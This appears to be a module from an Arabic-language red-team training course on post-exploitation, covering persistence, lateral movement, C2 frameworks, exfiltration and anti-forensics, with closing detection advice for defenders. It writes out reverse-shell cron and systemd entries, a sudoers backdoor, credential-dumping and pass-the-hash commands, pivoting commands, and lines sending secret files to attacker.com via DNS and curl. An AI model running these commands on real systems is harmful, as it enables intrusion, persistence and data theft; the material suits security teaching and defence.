الفرق الحمراء — الهجومخبير75mL46

Post-Exploitation — الشغل الحقيقي بعد ما تدخل

Persistence و Pivoting و C2 و Exfiltration

#Persistence#Pivoting#C2#Exfiltration

بعد الاختراق: إيه دلوقتي؟

تشبيه — شرح مبسط

طب وصلت root، خلاص؟ - آه طبعاً يا حضرتك! هاخد screenshot وأطلع. ها ها ها.. يا نجم الجيل.. ده الشغل لسه ما بدأش.

إنت دخلت البيت. بس المهاجم المحترف ما بياخدش اللي قدامه ويجري. الأول: بيعمل نسخة من المفتاح (persistence). تاني: بيطفي الكاميرات (defense evasion). تالت: بيتفرّج على باقي الأوض (lateral movement). رابع: بياخد اللي عايزه بهدوء (exfiltration).

في حادثة SolarWinds (2020)، APT29 الروسية فضلت جوه الشبكات لمدة 9 شهور. مش 9 ساعات. 9 شهور. عملت persistence بـ Golden SAML، lateral movement لـ 100 منظمة (منهم وزارة الخزانة الأمريكية)، و exfil ساكت بـ DNS tunneling. الـ initial access كان سهل. الـ post-exploitation هو اللي خلاهم أسطورة.

اوعى

اوعى تخرج بعد أول shell. ده مش الفيلم.

اوعى تفتح 5 reverse shells من نفس IP.

اوعى تنضّف الـ logs كلها — الفراغ أوضح من السطر الزائد.

غلطات الـ junior بعد الـ root

يفتح 5 reverse shells من نفس الـ IP. الـ network monitoring بيشوف الـ pattern في 30 ثانية.
يحط persistence في cron بـ comment اسمه "backdoor". الـ blue team بيلاقيها في أول grep.
يعمل dump للـ database كاملة دفعة واحدة. spike في الـ outbound traffic = تنبيه فوري.
ينسى ينظف الـ logs، أو ينظفها كلها (الفراغ الكامل أوضح من السطر الزائد).

Persistence — البقاء في النظام

على Linux

bash

# Cron
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/A/443 0>&1'" >> /etc/crontab

# systemd
cat > /etc/systemd/system/upd.service <<EOF
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/A/443 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable --now upd

# sudoers backdoor
echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers.d/99-upd

# SSH
echo "ssh-rsa AAAA... attacker" >> /root/.ssh/authorized_keys

على Windows

Scheduled Task + Run keys في الـ Registry.
WMI Event Subscription (صعب يتلقي).
DLL Hijacking + COM Hijacking.
على AD: Golden Ticket / Silver Ticket / DSRM password.

Lateral Movement — التحرك الجانبي

bash

nxc smb 10.10.0.0/24
mimikatz # sekurlsa::logonpasswords
crackmapexec smb 10.0.0.0/24 -u admin -H NTLM_HASH

# Pass-the-Hash
nxc smb 10.0.0.5 -u admin -H 31d6cfe0d16ae931...
# Pass-the-Ticket
Rubeus.exe asktgt /user:admin /rc4:NTLM /ptt

# Pivoting
chisel server -p 8080 --reverse
chisel client A:8080 R:1080:socks
proxychains nmap -sT 10.10.20.0/24

تقنيات تنفيذ عن بُعد

PsExec / smbexec / wmiexec / atexec (Impacket).
WinRM (evil-winrm).
DCOM / RDP / SCCM.

Command & Control (C2)

القناة بين المهاجم والجهاز المخترق. أشهر الأدوات:

Cobalt Strike

المعيار الصناعي للـ red teaming (تجاري).

Sliver

مفتوح المصدر وحديث، بيدعم mTLS / DNS / HTTP / WireGuard.

Mythic

إطار C2 بأكتر من agent.

Havoc / Brute Ratel

بدائل حديثة لـ Cobalt Strike.

إخفاء قناة C2

Domain fronting عبر CDN.
DNS tunneling (dnscat2, iodine).
قنوات على Slack / Discord / Telegram APIs.
Malleable C2 profiles عشان الترافيك يبان زي تطبيقات شرعية.

Exfiltration — تهريب البيانات

exfil

# DNS
for chunk in $(split -b 200 secret.txt); do dig $(base64 $chunk).attacker.com; done
# HTTPS
curl -s -X POST https://attacker.com/u -d @secret.tar.gz
# عبر cloud شرعي
rclone copy secret.tar.gz mega:/backup/

Anti-Forensics (للوعي الحمايةي فقط)

مسح ~/.bash_history و /var/log/wtmp.
timestomp — التلاعب بـ timestamps الملفات.
إقفال auditd / Sysmon / Defender.
تنضيف Event Logs في Windows.

المضاد

شحن السجلات لـ SIEM لحظياً (forwarder) عشان المهاجم ما يقدرش يمسحها محلياً. فعّل immutable backups + log integrity (AIDE / Wazuh FIM).

الخلاصة الناشفة

اكتبها على ظهر إيدك: الاختراق الحقيقي مش بيخلص بـ root. بيبدأ بـ root.
الـ junior ياخد screenshot ويطلع. الـ pro يقعد جوه شهور.
الـ APTs الكبيرة (APT29, APT41, Lazarus) قاعدين جوه الشبكات لسنين، بيمشوا ساكتين، بياخدوا اللي عايزينه على دفعات.

لو إنت blue team: مش الـ initial access هو اللي هيوقّعك. الـ persistence والـ lateral movement هما السكة الحقيقية. لو الـ EDR بتاعك بيشوف بس "exploit ran"، فإنت أعمى من ساعة الاختراق لحد ما الـ data تطلع.

راقب الـ SMB lateral، راقب الـ DNS الغريب، راقب الـ scheduled tasks الجديدة. ده الشغل الحقيقي.

Windows Privilege Escalation — وصول SYSTEM

الوحدة التالية

Lateral Movement — تتنقّل من غير ضوضا